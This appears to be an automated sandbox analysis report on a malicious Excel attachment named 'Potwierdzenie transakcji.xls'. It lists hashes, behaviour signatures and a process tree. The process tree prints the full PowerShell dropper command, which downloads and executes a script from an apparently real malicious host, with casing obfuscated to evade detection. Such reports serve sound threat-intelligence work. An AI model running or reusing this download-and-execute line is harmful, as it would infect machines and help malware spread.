Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows7_x64 -
resource
win7 -
submitted
30-06-2020 10:54
General
-
Target
Potwierdzenie transakcji.xls
-
Size
856KB
-
MD5
02bebda14734b392c40e86a08717e140
-
SHA1
95a6a416f682a9d254e76ec38ade01ce241b3366
-
SHA256
debf78ac913e3b76debc7c4745d1e9ff858d6f3392ad02db78eb18408ac4beaf
-
SHA512
9f72ca77987b210012156cba8f8b43c2e3bd0ff109c7c665088cc92eb4ca8374576c7f4c4b6dd67e04846124f143017c62ca9930d78f6bebe435bfb3382c992c
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://officeservicecorp.biz/Lab.jpg
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Suspicious use of WriteProcessMemory 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Potwierdzenie transakcji.xls"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://officeservicecorp.biz/Lab.jpg')2⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/284-0-0x0000000000000000-mapping.dmp